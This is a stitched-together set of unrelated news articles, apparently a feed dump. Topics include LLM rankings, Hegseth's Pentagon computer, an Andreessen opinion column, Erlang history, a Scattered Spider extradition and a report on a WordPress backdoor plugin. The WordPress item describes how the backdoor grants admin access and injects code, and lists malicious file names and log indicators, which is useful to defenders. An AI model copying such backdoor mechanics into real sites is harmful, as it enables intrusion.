If the arena isn’t giving us a good enough impression of who is winning the race for best LLM at the moment, what else can we look to?
Andrej Karpathy
discussed the new paper
on Twitter this morning and proposed an alternative source of rankings instead:
It’s quite likely that LM Arena (and LLM providers) can continue to iterate and improve within this paradigm, but in addition I also have a new candidate in mind to potentially join the ranks of “top tier eval”. It is the
OpenRouterAI LLM rankings
.
Basically, OpenRouter allows people/companies to quickly switch APIs between LLM providers. All of them have real use cases (not toy problems or puzzles), they have their own private evals, and all of them have an incentive to get their choices right, so by choosing one LLM over another they are directly voting for some combo of capability+cost.
I don’t think OpenRouter is there just yet in both the quantity and diversity of use, but something of this kind I think has great potential to grow into a very nice, very difficult to game eval.
I only recently learned about
these rankings
but I agree with Andrej: they reveal some interesting patterns that look to match my own intuitions about which models are the most useful (and economical) on which to build software. Here’s a snapshot of their current “Top this month” table:
The one big weakness of this ranking system is that a single, high volume OpenRouter customer could have an outsized effect on the rankings should they decide to switch models. It will be interesting to see if OpenRouter can design their own statistical mechanisms to help reduce that effect.
US defense secretary circumvents the official communications equipment
US defense secretary
Pete Hegseth
appears to have a private computer in his office that is linked to the public internet. He wanted this computer to use the messaging app
Signal
, which is the preferred method of communication among Trump's government officials.
US defense secretary Pete Hegseth in his office in the Pentagon, January 30, 2025
(Still from a
video message
on X, formerly Twitter)
Hegseth's government equipment
Like his predecessors, Trump's defense secretary Pete Hegseth has access to a range of secure and non-secure telephone and computer networks. The equipment is installed at a table behind his back, when sitting at his big writing desk in the Pentagon.
In the photo above we can see that equipment in a set-up that has basically been
unchanged
since Chuck Hagel, who was Obama's secretary of Defense from 2013 to 2015. In the photo of Pete Hegseth we see from left to right:
- On top of a wooden stand sits a Cisco IP Phone 8851 with a 14-key
expansion module
. This phone is part of the Crisis Management System (CMS), which connects the President, the National Security Council, Cabinet members, the Joint Chiefs of Staff, intelligence agency watch centers, and others. Its bright yellow bezel indicates that it can be used for conversations up to Top Secret/Sensitive Compartmented Information (TS/SCI).
- Below the CMS phone on the wooden stand is (hardly visible) an
Integrated Services Telephone-2
(IST-2), which can be used for both secure and non-secure phone calls. This phone belongs to the
Defense Red Switch Network
(DRSN), also known as the Multilevel Secure Voice service, which connects the White House, all military command centers, intelligence agencies, government departments and NATO allies.
- Right in front of the IST-2 is another Cisco IP Phone 8851 with a 14-key expansion module, but this time with a green bezel, which indicates that it's for unclassified phone calls. This phone is part of the internal telephone network of the Pentagon and replaced an
Avaya Lucent 6424
executive phone.
A better view of these phones is provided by the following photo from 2021:
Former secretary of defense Lloyd Austin in his Pentagon office in 2021,
with a Cisco IP phone with yellow bezel for the CMS and
an IST-2 phone with many red buttons for the DRSN.
(DoD photo - click to enlarge)
- Besides the telephones there are two computer screens, both with a bright green wallpaper, which again indicates that they are connected to an unclassified network, most likely
NIPRNet
. In the photo of Lloyd Austin's office we see that there's also a
KVM switch
which is used to switch securely to the
SIPRNet
(Secret) and
JWICS
(Top Secret/SCI) networks, using the same keyboard, video and mouse set.
- Finally, at the right side of the table there are two
Cisco Webex DX80
videoteleconferencing screens. The one at the right has a yellow label, which indicates that it's approved for Top Secret/SCI and most likely belongs to the Secure Video Teleconferencing System (SVTS), which is part of the aforementioned Crisis Management System (CMS). The other screen might then be for videoconferences at a lower classification level.
Hegseth's personal computer
Despite the wide range of options for communicating via the proper and secure government channels, secretary Hegseth insisted on using Signal. Apparently it wasn't allowed or possible to install this app on one of the government computers, nor on a smartphone that is approved for classified conversations.
Therefore, Hegseth initially went to the back area of his office where he could access Wi-Fi to use Signal,
according
to AP News. It's not clear whether he used a private laptop or his personal smartphone, both of which would have been strictly forbidden to use in secure areas like this.
Somewhat later, Hegseth requested an internet connection to his desk where he could use a computer of his own. This line connects directly to the public internet and bypassed the Pentagon's security protocols. This new computer must be the one that can be seen in the photo below, as it wasn't there yet on
February 21
and has no labels that indicate its classification level:
US defense secretary with a new desktop computer on his desk, March 20, 2025
(DoD photo, see also this
video message
on X)
Some other employees at the Pentagon also
use
direct lines to the public internet, for example when they don't want to be recognized by an IP address assigned to the Pentagon. That's risky because such a line is less well monitored than NIPRNet, which allows limited access to the outside internet.
At his new desktop computer, Hegseth
had
Signal installed, which means he effectively 'cloned' the Signal app that is on his personal smartphone. He also had interest in the installation of a program to send conventional text messages from this personal computer, according to some press sources.
The move was intended to
circumvent
a lack of cellphone service in much of the Pentagon and enable easier communication with the White House and other Trump officials who are using the Signal app.
SecDef Cables
It is remarkable to what great lengths Hegseth went to use the Signal app, because as defense secretary he has his own communications center which is specialized in keeping him in contact with anyone he wants. This center is commonly called SecDef Cables and is part of
Secretary of Defense Communications
(SDC) unit.
SecDef Cables provides operational information management and functions as a command and control support center. It is staffed by 26 service members and 4 civilians. They provide "comprehensive voice, video, and data capabilities to the secretary and his immediate staff, regardless of their location, across multiple platforms and classifications."
Furthermore, SecDef Cables serves as a liaison to the National Military Command Center (NMCC), the White House Situation Room, the State Department Operations Center and similar communication centers. Finally, Cables provides the connections for the Defense Telephone Link (DTL), which is a lower-level hotline with military counterparts in about 25 countries, including Russia and China.
Secretary of Defense Communications recruitment video from 2023
Today, we are glad to announce that ESP32-C5 is now in mass production.
Espressif Systems (SSE: 688018.SH) announced ESP32-C5, the industry’s first RISC-V SoC that supports 2.4 GHz and 5 GHz dual-band Wi-Fi 6, along with Bluetooth 5 (LE) and IEEE 802.15.4 (Zigbee, Thread) connectivity. Today, we are glad to announce that ESP32-C5 is now in mass production.
ESP32-C5 is designed for applications that require high-efficiency, low-latency wireless transmission. ESP32-C5 has a 32-bit single-core processor which can clock up to 240 MHz in speed. It has a 384 KB on-chip SRAM along with external PSRAM support, 320 KB of ROM. It has up to 29 programmable GPIOs, supporting all the commonly used peripherals, high speed interfaces like SDIO, QSPI, and the best-in-class security features. The ESP32-C5 also includes an LP-CPU running upto 40MHz which can act as the main processor for power sensitive applications. To learn more about the various capabilities and features of this MCU, please visit our
website
.
The ESP32-C5 benefits from software support provided by Espressif's well-established IoT development framework, ESP-IDF. The upcoming ESP-IDF v5.5, will include initial support for the ESP32-C5. For a detailed list of ESP-IDF features supported for the ESP32-C5,
click here
. The ESP32-C5 can also act as the connectivity coprocessor for external hosts using the
ESP-AT
or
ESP-Hosted
solutions.
Marc Andreessen, Tucker Carlson, and a Winklevoss walk into a bar… and the rest of us run out of it screaming.
Marc Andreessen attends the 10th Annual Breakthrough Prize Ceremony at the Academy Museum of Motion Pictures on April 13, 2024, in Los Angeles.
(JC Olivera / WireImage via Getty Images))
For anyone thinking that the notorious Signal chat organizing a bombing raid on the Houthis was a
one-off lapse of judgment
by the people at the center of American power (possibly because it involved Pete Hegseth),
Semafor
media scribe Ben Smith
comes bearing the tale
of a much larger, more influential mustering of Signal-ites. Smith’s piece concerns a cluster of ultra-wealthy and/or politically connected Silicon Valley plutocrats who, after several earlier forays into unbuckled opinion-shaping on secure chat platforms, now swap critiques and aperçus on a Signal group chat dubbed Chatham House, after a privacy-conscious international policy think tank based in London.
Like all things involving Silicon Valley, the group name is a symptom of delusional collective self-regard. The original think tank, founded in the wake of the 1919 Treaty of Versailles, has sought to chart new global accords on issues ranging from 20th-century decolonization to climate-change mitigation; its online LARPers include such luminaries as right-wing apparatchik-for-hire Chris Rufo and Sriram Krishnam, the Trump administration’s senior policy adviser for AI. The chat’s chief ringleader is Marc Andreessen, the erstwhile Netscape founder and present-day lord of venture capital, who, as Smith notes, has been instrumental in Silicon Valley’s fulsome embrace of Donald Trump. By distilling the ideological leanings of the Silicon Valley elite, Chatham House and its forerunner chats exert an outsize kind of cultural and political clout, Smith writes. In getting key influencers and business titans on the same page, “their influence flows through X, Substack, and podcasts, and constitutes a kind of dark matter of American politics and media. The group chats aren’t always primarily a political space, but they are the single most important place in which a stunning realignment toward Donald Trump was shaped and negotiated, and an alliance between Silicon Valley and the new right formed.”
No doubt Andreessen and his fellow chatters are gratified to see themselves hymned in such heady terms, but what Smith has unearthed of the chat’s exchanges and thematic preoccupations bespeaks a much more mundane and inert boardroom-grade discourse of like-minded self-congratulation, with a heavy dose of culture-war persecution fantasies to keep things feeling edgy. It’s less dark matter than brain-dead matter.
That, by itself, isn’t an indictment of the Chatham House set—these are features endemic to e-mail listservs and group chats, which serve chiefly as a group-surveillance mechanism to ensure that participants don’t end up entertaining remotely original thoughts. Yet, to give credit to Smith’s scooplet, the Chatham chats do furnish valuable insight into the preferred mode of groupthink endorsed by our digital overlords. And not surprisingly, this brand of orthodoxy hinges on the grand conceit that they and their peers are the chosen prime movers of history—and that dissenters are, at best, misguided Luddites, and at worst, power-mad and puritanical censors.
Don’t take my word for it. Here’s Smith’s report on the group’s titanic sense of entitlement:
Many of the roughly 20 participants I spoke to…felt a genuine sentimental attachment to the spaces, and believed in their value. One participant in the groups described them as a “Republic of Letters,” a reference to the long-distance intellectual correspondence of the 17th century. Others often invoked European salon culture. The closed groups offered an alternative to the Twitter and Slack conversations once dominated by progressive social movements, when polarizing health debates swept through social media and society in the early days of the COVID-19 pandemic.
Current Issue
If you think that feeling victimized by public health strictures and stray Twitter trolls is a good deal short of the spirit of Voltaire and Madame de Stael, just get a load of Andreessen’s own maunderings. Andreessen, it emerges, is a manic poster to Chatham House and an untold number of other plutocratic-friendly group chats; Smith recounts how one attendee at a conference sitting alongside Andreesen saw him frenetically posting to several chats at lightning speed on his phone. That level of passionate intensity corresponds to Andreessen’s rhetorical overkill in characterizing the role of these chats. They are, he pronounced in a February podcast appearance, “the equivalent of samizdat” offering bold freethinkers refuge in a regime of “soft authoritarian” conformity enforced by social media mobs and censorship-drunk administrators.
So what, exactly, are the big ideas bandied about in these chats that are simply too incendiary for the sclerotic custodians of the old Twitter politburo? Per Smith, the effects of Chatham House iconoclasm “have ranged from the mainstreaming of the monarchist pundit Curtis Yarvin to a particularly focused and developed dislike of the former Washington Post writer Taylor Lorenz.” Take that, Enlightenment philosophes! You’d think that soi-disant liberators of humanity like Andreessen might pause to reflect that there’s nothing all that samizdat-ish about platforming a fucking monarchist—let alone unleashing a strategic alliance against an overdramatic tech reporter. But this combination of free-floating tetchiness and laser-focused pettiness is at the heart of what Andreesen is pleased to call his curation of the new national “vibe shift,” as the fortunes of one of his earlier group chats makes all too plain.
As Smith lays out in numbing detail, an embryonic version of the Chatham House thread was populated by a mixture of the professionally aggrieved Valley leadership caste and a number of the signatories of the 2020 “Harper’s Letter” that professed to divine a troubling new epidemic of PC censorship of American intellectual discourse. The chat, in a good example of what passes for humor among this crowd, was called “Everything’s Fine.” Yet a fatal schism occurred when two participants—
Atlantic
writer Thomas Chatterton Williams and podcast host Kmele Foster—collaborated with David French and Jason Stanley on a
New York Times
op-ed denouncing the moral panic over critical race theory as a betrayal of First Amendment principles. The right-wingers on the chat regarded that as a faithless act from people they regarded as “their allies in an all-out ideological battle,” Smith writes. One erstwhile member recalls that Andreesen in particular “went really ballistic in a quite personal way at Thomas,” and shortly afterward announced that he was bailing from the group, thereby denying it of its principal posting stream. It died out in short order—along with, presumably, the countless breakthroughs that surely would have emerged out of such a hotbed of intellectual activity.
Andresseen’s outburst was more than the classic hypocrisy and bad faith of the “free speech for me but not for thee” opportunist. It’s clear that, despite all his bluster about promoting open debate in a world ridden with small-minded and vengeful censors, Andreessen endorses only the kind of debate that ratifies his pre-existing prejudices. It was, indeed, in that spirit that he prevailed upon Richard Hanania—then an ardent white nationalist on the right—to launch a new group chat “of smart right-wing people.” The chat had no fixed name, but the rotating sobriquets Andreessen graced it with speak volumes about his preferred brand of samizdat discourse; they included “Last Men, apparently,” “James Burnham Fan Club,” “Matt Yglesias Fan Club” and “Journalism Deniers and Richard,” apparently in reference to Hanania. For his part, Hanania, who is now in the midst of a public defection from the hardcore anti-woke right, told Smith that he left the chat in 2023, after seeing it devolve into “a vehicle for groupthink.” He recalls breaking with many participants “about whether it’s a good idea to buy into Trump’s election denial stuff. I’d say, ‘That’s not true and that actually matters.’ I got the sense these guys didn’t want to hear it. There’s an idea that you don’t criticize, because what really matters is defeating the left.”
As for Chatham House, it’s now apparently weathering its own schism over Trump’s regressive tariffs policy, which are anathema to a tech industry heavily reliant on Asian labor markets and supply chains. In one of the only chat transcripts Smith was able to obtain, David Sacks, the hedge-fund billionaire who now serves as Trump’s AI and crypto czar, announces his defection from the group by saying it’s “become worthless” due to rampant Trump derangement syndrome—triggering in turn the departures of other influential MAGA sycophants like Tucker Carlson and Tyler Winklevoss. (Nothing says “Republic of Letters” like those two. You can practically smell the brilliance.) Before scarpering, Sacks also prevailed on the chat manager to “create a new [chat] with just smart people,” again illustrating the suffocatingly narrow conception of intelligence now on offer for both Sand Hill Road and Pennsylvania Avenue.
For someone who entertains such reveries of personal and political grandeur—and who so jealously guards his private exercise of intellectual freedom—it’s useful to be reminded of how Marc Andreessen really views the world. Historian Rick Perlstein—an old friend and ally—has published
a bracing remembrance
of a 2017 talk he gave at one of Andreessen’s Northern California manses, at the invitation of a book group Andreessen belonged to. The evening was mostly taken up with genial plutocratic badinage, Perlstein recalled, with a recently designated British noble chiding him for his naïveté about the democratic aspirations of the Chinese middle class, and general calumny cast at Senator Elizabeth Warren for the sin of standing athwart “innovation in the banking sector.” After dinner, Perlstein, a native of Milwaukee, fell into a tête-à-tête with Andreessen about his own upbringing in a small rural Wisconsin town. As Perlstein recalls, his host broke off the exchange with this general sentiment: “I’m glad there’s OxyContin and video games to keep those people quiet.”
Perlstein cautioned that the quote wasn’t exact, and indeed invited Andreessen to correct the wording. Instead, Andreessen denounced Perlstein’s recollection as a complete fabrication, and his Valley-bred crony JD Vance, among others,
leapt in to deride Perlstein
as another peddler of fake news. (No doubt the whole episode, which occurred in April of 2024, didn’t hurt Vance’s standing as Trump’s eventual vice-presidential nominee.) Having worked closely with Perlstein for more than three decades now (and having heard an earlier version of the story in conversation with him), I have utterly no doubt of his veracity; if anything, Vance’s intervention is surefire testimony to Perlstein’s truthfulness, given our vice president’s penchant for self-advancing mendacity. Yet for any on-the-make MAGA edgelord like Andreessen to be caught out deriding the movement’s base in the putative
strains of Barack Obama
(or more aptly in this case,
Lonesome Rhodes
), is a career death sentence. You can be sure that he took to a wide assortment of group chats to flog his lovingly curated victim narrative and to defend what might charitably be termed his honor.
The chaos and cruelty of the Trump administration reaches new lows each week.
Trump’s catastrophic “Liberation Day” has wreaked havoc on the world economy and set up yet another constitutional crisis at home. Plainclothes officers continue to abduct university students off the streets. So-called “enemy aliens” are flown abroad to a mega prison against the orders of the courts. And Signalgate promises to be the first of many incompetence scandals that expose the brutal violence at the core of the American empire.
At a time when elite universities, powerful law firms, and influential media outlets are capitulating to Trump’s intimidation,
The Nation
is more determined than ever before to hold the powerful to account.
In just the last month, we’ve published reporting on how Trump outsources his mass deportation agenda to other countries, exposed the administration’s appeal to obscure laws to carry out its repressive agenda, and amplified the voices of brave student activists targeted by universities.
We also continue to tell the stories of those who fight back against Trump and Musk, whether on the streets in growing protest movements, in town halls across the country, or in critical state elections—like Wisconsin’s recent state Supreme Court race—that provide a model for resisting Trumpism and prove that Musk can’t buy our democracy.
This is the journalism that matters in 2025. But we can’t do this without you. As a reader-supported publication, we rely on the support of generous donors. Please, help make our essential independent journalism possible with a donation today.
Pre- and post-domestic laundering of bacteria contaminated textiles. Credit: Dr. Caroline Cayrou, CC-BY 4.0 (https://creativecommons.org/licenses/by/4.0/)
Health care workers who wash their uniforms at home may be unknowingly contributing to the spread of antibiotic-resistant infections in hospitals, according to a new study led by Katie Laird of De Montfort University,
published
in
PLOS One.
Hospital-acquired infections are a major public health concern, in part because they frequently involve antibiotic-resistant bacteria. Many nurses and health care workers clean their uniforms at home in standard washing machines, but some studies have found that bacteria can be transmitted through clothing, raising the question of whether these machines can sufficiently prevent the spread of dangerous microbes.
In the new study, researchers evaluated whether six models of home washing machine successfully decontaminated health care worker uniforms, by washing contaminated fabric swatches in hot water, using a rapid or normal cycle. Half of the machines did not disinfect the clothing during a rapid cycle, while one-third failed to clean sufficiently during the standard cycle.
The team also sampled biofilms from inside 12 washing machines. DNA sequencing revealed the presence of potentially pathogenic bacteria and
antibiotic resistance genes
. Investigations also showed that bacteria can develop resistance to domestic detergent, which also increases their resistance to certain antibiotics.
Together, the findings suggest that many home washing machines may be insufficient for decontaminating health care worker uniforms, and may be contributing to the spread of
hospital
-acquired infections and antibiotic resistance. The researchers propose that the laundering guidelines given to health care workers should be revised to ensure that home washing machines are cleaning effectively. Alternatively, health care facilities could use on-site industrial machines to launder uniforms to improve
patient safety
and control the spread of antibiotic-resistant pathogens.
The authors add, "Our research shows that domestic washing machines often fail to disinfect textiles, allowing
antibiotic-resistant bacteria
to survive. If we're serious about the transmission of infectious disease via textiles and tackling antimicrobial resistance, we must rethink how we launder what our
health care workers
wear."
Citation
:
Home washing machines fail to remove important pathogens from textiles (2025, April 30)
retrieved 30 April 2025
from https://medicalxpress.com/news/2025-04-home-machines-important-pathogens-textiles.html
This document is subject to copyright. Apart from any fair dealing for the purpose of private study or research, no
part may be reproduced without the written permission. The content is provided for information purposes only.
This is the story of Erlang, a programming language that was maybe too good for its own sake.
Corporate blunders are nothing new. Many of these blunders are widely known, such as the time Blockbuster declined to purchase Netflix, or the time Daimler-Benz lost 20 billion dollars on Chrysler. But how many remember when Ericsson created a programming language so disruptive, and so efficient, that they banned it? This is the fascinating and little known story behind Erlang.
The Backdrop
The story begins in 1982, at the Swedish telecommunication giant Ericsson. Ericsson, at this time, decided to experiment with the programming of telecom - with the goal of improving the development of telephone equipment.
They began with a list of over 20 languages, including Lisp, Prolog, and Parlog, filtering out unsuitable ones with the help of 2 main criteria.
Side note: I’m going to keep the explanations fairly simple here, so that it’s easier to understand for people who perhaps aren’t programmers.
The first criteria was that the language had to be “high level” and “symbolic”. A high level language is essentially a language that can be easily written and read by a person. This is then transformed by a ‘compiler’ into more specific instructions which a computer processor can understand. Symbolic means that the language uses characters or symbols to represent concepts like mathematical operations, for example plus (+) and minus (-). These two factors help make software development simpler and faster.
The second criteria was that the language had to have primitives for concurrency and error recovery, and the execution model couldn’t have back-tracking. Without going into the details, this essentially just means that the language had to be capable of:
Doing multiple things at once
Recovering and not crashing due to errors
Executing instructions in a certain order, without going back to previous instructions.
With the criteria defined, the team at Ericsson began narrowing down their list of potential languages. 3 years later, in 1985/‘86, their list had gone from over 20 languages to…
Zero
. Whilst certain languages fulfilled some of their criteria, none of them had everything the team wanted. The solution was therefore to develop their own language, combining desirable features from all the evaluated ones.
And thus, Erlang was born!
Early Development
Experiments with this new language began as soon as 1987. By 1989, they had reconstructed about 1/10th of the Ericsson MD-110 system using Erlang, as a proof of concept. And the results were staggering. Compared to the amount of time needed to develop the features with the then-standard at Ericsson, Erlang was faster by a factor of 3 to 25, depending upon the feature concerned! On average, productivity increased by a factor of 8!
The Ericsson MD-110. Credit: Järnvägsmuseet
However, there were problems. This massive productivity increase factor was very controversial within Ericsson, and many theories were created to explain away the findings. Erlang’s late co-creator, Joe Armstrong, explained that:
“It seemed at the time that people disliked the idea that the effect could be due to having a better programming language, preferring to believe that it was due to some “smart programmer effect”. Eventually we downgraded the factor to a mere 3 because it sounded more credible than 8. The factor 3 was totally arbitrary, chosen to be sufficiently high to be impressive, and sufficiently low to be believable. In any case, it was significantly greater than one, no matter how you measured and no matter how you explained the facts away”.
— Joe Armstrong
1
And even this paled in comparison to the bigger problem. Whilst development proved to be faster, Erlang itself was far too slow. For Erlang to be viable, it had to become 40 times faster.
Nonetheless, the team
(which by the way was just 2 people at this point!)
knew they were onto something great. This was proven that same year at the SETSS conference in Bournemouth, where they had the chance to present Erlang to the world. Armstrong wrote in his paper that:
I remember Mike, Robert and I having great fun asking the same question over and over again: “what happens if it fails?” - the answer we got was almost always a variant on “our model assumes no failures". We seemed to be the only people in the world designing a system that could recover from software failures.”
1
They were in fact so confident that Armstrong goes on to say that
“At the Bournemouth conference everybody told us we were wrong […] but we left the conference feeling happy that the rest of the world was wrong and that we were right”.
1
Over the next 6 years, Erlang was improved and expanded greatly, speeding up the language significantly, and introducing many new features. When the team (which had by now grown to hundreds of people) wasn’t making vast technical improvements, they were busy marketing Erlang, and partnering up with companies. This included delivering their first copy of Erlang to Bellcore (now iconectiv) in 1990.
Then, in December of 1995, everything changed.
The Big Break
In December of 1995, a massive project at Ellemtel called AXE-N failed. It’s failure was such that even Ericsson AB’s website quotes their staff magazine saying:
“People fainted at the meetings, some wept while others displayed no reaction at all; they appeared to be totally unmoved.”
2
The AXE-N, a switching system, was meant to be a hardware and software replacement for the older AXE10 systems, with the software developed in C++.
With this collapse, however, the door opened for Erlang, which was chosen to be the replacement programming language (whilst the hardware was re-used). The project recieved a new name, too, now dubbed the AXD. In his article for HOPL III, Joe Armstrong anknowledged that without this event, the language would have never left the Ericsson lab.
Instead, this became the largest Erlang project (most probably ever), employing over 60 Erlang developers. Additionally, all external marketing for the language was stopped, with focus being solidly redirected to internal development. By the launch of the AXD 301 switch in March of 1998, the system had 1,13 million lines of Erlang code (this figure grew to over 2.6 million across the AXD’s lifetime).
An AXD301 rack. Credit: carritech.com
But number of lines of code isn’t, nor should it be, impressive. What truly showed the potential of Erlang was the fact that out of the 60-person team of programmers, the majority came from industrial backgrounds, with no prior knowledge of concurrent or functional programming! Instead, most of them were taught Erlang by Armstrong and his colleagues.
Furthermore, Armstrong claimed that by conservative estimates, one line of Erlang corresponded to about five lines of C, meaning that a corresponding system in C would have had over
6 million
lines of code at launch.
This is made further impressive by the fact that the AXD 301 had an observed nine-nines reliability. This meant that over a 20 year period that the AXD 301 provided services, the services were online 99.9999999% of the time.
Coupled with an estimated 4x increase in productivity during the development cycle, this meant that the project was by all measures wildly successful.
Downfall
The Erlang team, however, didn’t have much of a chance to celebrate. Even before the launch of the AXD 301 system, in February of 1998, Ericsson Radio Systems (a subset of Ericsson) had banned the use of Erlang within its company, claiming amongst other things that the use of a proprietary language wasn’t beneficial. Many view this and other excuses as rather ‘flimsy’, which has given rise to a number of less-discussed theories on the
actual
reason for the ban…
Regardless, this effectively marked the end of Erlang within Ericsson as a whole. The team thus lobbied management to release the language under an open-source license (with much of the lobbying work being done by Jane Walerud). Eventually, management agreed, and Erlang was released into the wild in December of 1998.
Aftermath
With Erlang free-to-use, the majority of the original development team (understandably) resigned from the company, starting Bluetail AB, with Jane Walerud as the CEO. Just two years later, Bluetail was sold to Nortel Networks for $152 million dollars. The feeling of victory didn’t last for longer, either, as the IT crash of the early 2000’s came just half a year after the sale, leaving half the Bluetail team (un)employed at Nortel.
Closing Notes
If you found this interesting, I’d highly encourage you to read Joe Armstrong’s entire article. It’s a very interesting and far more detailed (and technical) reaccounting of Erlang’s development. Most of the information in this post comes from there, and a lecture from
John Hughes
which I had the privilege of attending at Chalmers.
Alleged ‘Scattered Spider’ Member Extradited to U.S.
Krebs
krebsonsecurity.com
2025-04-30 22:54:59
A 23-year-old Scottish man thought to be a member of the prolific Scattered Spider cybercrime group was extradited last week from Spain to the United States, where he is facing charges of wire fraud, conspiracy and identity theft. U.S. prosecutors allege Tyler Robert Buchanan and co-conspirators hac...
A 23-year-old Scottish man thought to be a member of the prolific
Scattered Spider
cybercrime group was extradited last week from Spain to the United States, where he is facing charges of wire fraud, conspiracy and identity theft. U.S. prosecutors allege
Tyler Robert Buchanan
and co-conspirators hacked into dozens of companies in the United States and abroad, and that he personally controlled more than $26 million stolen from victims.
Scattered Spider is a loosely affiliated criminal hacking group whose members have broken into and stolen data from some of the world’s largest technology companies. Buchanan was arrested in Spain last year on a warrant from the FBI, which wanted him in connection with a series of SMS-based phishing attacks in the summer of 2022 that led to intrusions at Twilio, LastPass, DoorDash, Mailchimp, and many other tech firms.
Tyler Buchanan, being escorted by Spanish police at the airport in Palma de Mallorca in June 2024.
As
first reported
by KrebsOnSecurity, Buchanan (a.k.a. “tylerb”) fled the United Kingdom in February 2023, after a rival cybercrime gang hired thugs to invade his home, assault his mother, and threaten to burn him with a blowtorch unless he gave up the keys to his cryptocurrency wallet. Buchanan was arrested in June 2024 at the airport in Palma de Mallorca while trying to board a flight to Italy. His extradition to the United States was
first reported
last week by
Bloomberg
.
Members of Scattered Spider have been
tied
to the 2023 ransomware attacks against
MGM
and
Caesars
casinos in Las Vegas, but it remains unclear whether Buchanan was implicated in that incident. The Justice Department’s complaint against Buchanan makes no mention of the 2023 ransomware attack.
Rather, the investigation into Buchanan appears to center on the SMS phishing campaigns from 2022, and on
SIM-swapping attacks
that siphoned funds from individual cryptocurrency investors. In a SIM-swapping attack, crooks transfer the target’s phone number to a device they control and intercept any text messages or phone calls to the victim’s device — including one-time passcodes for authentication and password reset links sent via SMS.
In August 2022, KrebsOnSecurity
reviewed data harvested in a months-long cybercrime campaign by Scattered Spider
involving countless SMS-based phishing attacks against employees at major corporations. The security firm
Group-IB
called them by a different name —
0ktapus
, because the group typically spoofed the identity provider
Okta
in their phishing messages to employees at targeted firms.
A Scattered Spider/0Ktapus SMS phishing lure sent to Twilio employees in 2022.
The
complaint against Buchanan
(PDF) says the FBI tied him to the 2022 SMS phishing attacks after discovering the same username and email address was used to register numerous Okta-themed phishing domains seen in the campaign. The domain registrar
NameCheap
found that less than a month before the phishing spree, the account that registered those domains logged in from an Internet address in the U.K. FBI investigators said the Scottish police told them the address was leased to Buchanan from January 26, 2022 to November 7, 2022.
Authorities seized at least 20 digital devices when they raided Buchanan’s residence, and on one of those devices they found usernames and passwords for employees of three different companies targeted in the phishing campaign.
“The FBI’s investigation to date has gathered evidence showing that Buchanan and his co-conspirators targeted at least 45 companies in the United States and abroad, including Canada, India, and the United Kingdom,” the FBI complaint reads. “One of Buchanan’s devices contained a screenshot of Telegram messages between an account known to be used by Buchanan and other unidentified co-conspirators discussing dividing up the proceeds of SIM swapping.”
U.S. prosecutors allege that records obtained from Discord showed the same U.K. Internet address was used to operate a Discord account that specified a cryptocurrency wallet when asking another user to send funds. The complaint says the publicly available transaction history for that payment address shows approximately 391 bitcoin was transferred in and out of this address between October 2022 and
February 2023; 391 bitcoin is presently worth more than $26 million.
In November 2024, federal prosecutors in Los Angeles
unsealed criminal charges against Buchanan
and four other alleged Scattered Spider members, including
Ahmed Elbadawy
, 23, of College Station, Texas;
Joel Evans
, 25, of Jacksonville, North Carolina;
Evans Osiebo
, 20, of Dallas; and
Noah Urban
, 20, of Palm Coast, Florida. KrebsOnSecurity
reported last year
that another suspected Scattered Spider member — a 17-year-old from the United Kingdom — was arrested as part of a joint investigation with the FBI into the MGM hack.
Mr. Buchanan’s court-appointed attorney did not respond to a request for comment. The accused faces charges of wire fraud conspiracy, conspiracy to obtain information by computer for private financial gain, and aggravated identity theft. Convictions on the latter charge carry a minimum sentence of two years in prison.
Documents from the U.S. District Court for the Central District of California indicate Buchanan is being held without bail pending trial. A preliminary hearing in the case is slated for May 6.
Mercury, the first commercial-scale diffusion language model
WordPress plugin disguised as a security tool injects backdoor
Bleeping Computer
www.bleepingcomputer.com
2025-04-30 22:05:46
A new malware campaign targeting WordPress sites employs a malicious plugin disguised as a security tool to trick users into installing and trusting it. [...]...
A new malware campaign targeting WordPress sites employs a malicious plugin disguised as a security tool to trick users into installing and trusting it.
According to Wordfence researchers, the malware provides attackers with persistent access, remote code execution, and JavaScript injection. At the same time, it remains hidden from the plugin dashboard to evade detection.
Wordfence first discovered the malware during a site cleanup in late January 2025, where it found a modified 'wp-cron.php' file, which creates and programmatically activates a malicious plugin named 'WP-antymalwary-bot.php.'
Other plugin names used in the campaign include:
addons.php
wpconsole.php
wp-performance-booster.php
scr.php
If the plugin is deleted, wp-cron.php re-creates and reactivates it automatically on the next site visit.
Lacking server logs to help identify the exact infection chain, Wordfence hypothesizes the infection occurs via a compromised hosting account or FTP credentials.
Not much is known about the perpetrators, though the researchers noted that the command and control (C2) server is located in Cyprus, and there are traits similar to a
June 2024 supply chain attack
.
Once active on the server, the plugin performs a self-status check and then gives the attacker administrator access.
"The plugin provides immediate administrator access to threat actors via the emergency_login_all_admins function,"
explains Wordfence in its writeup
.
"This function utilizes the emergency_login GET parameter in order to allow attackers to obtain administrator access to the dashboard."
"If the correct cleartext password is provided, the function fetches all administrator user records from the database, picks the first one, and logs the attacker in as that user."
Next, the plugin registers an unauthenticated custom REST API route that allows the insertion of arbitrary PHP code into all active theme header.php files, clearing of plugin caches, and other commands processed via a POST parameter.
An updated version of the malware can also inject base64-decoded JavaScript into the site's <head> section, likely for serving visitors ads, spam, or redirecting them to unsafe sites.
Apart from file-based indicators like the listed plugins, website owners should scrutinize their 'wp-cron.php' and 'header.php' files for unexpected additions or modifications.
Access logs containing 'emergency_login,' 'check_plugin,' 'urlchange,' and 'key' should also serve as red flags, warranting further investigation.
Meta’s quarterly earnings beat Wall Street expectations as its AI investments rise by billions
Guardian
www.theguardian.com
2025-04-30 21:50:05
‘We’ve had a strong start to an important year’, Zuckerberg said as company posts $42.35bn in revenue for first quarter Meta reported earnings on Wednesday, beating Wall Street’s expectations for yet another quarter even as it lavishes billions on artificial intelligence. Meta posted $42.32bn in rev...
Meta
reported earnings on Wednesday, beating Wall Street’s expectations for yet another quarter even as it lavishes billions on artificial intelligence.
Meta posted $42.32bn in revenue in the first quarter of 2025, beating both its own quarterly revenue goals of $41.8bn at the higher end and Wall Street expectations of $41.38bn.
The company also reported $6.43 in earnings per share, beating Wall Street projections of $5.27. Shares jumped in after-hours trading.
“We’ve had a strong start to an important year, our community continues to grow and our business is performing very well,” said Meta’s chief executive,
Mark Zuckerberg
. “We’re making good progress on AI glasses and Meta AI, which now has almost 1bn monthly actives.”
Speaking on the investor call, Zuckerberg said the company was performing well and its platforms were growing, making it “well-positioned to navigate” any macroeconomic uncertainty.
“I continue to think this year is going to be a pivotal moment in our industry,” he said.
This continues Meta’s streak of beating Wall Street
expectations
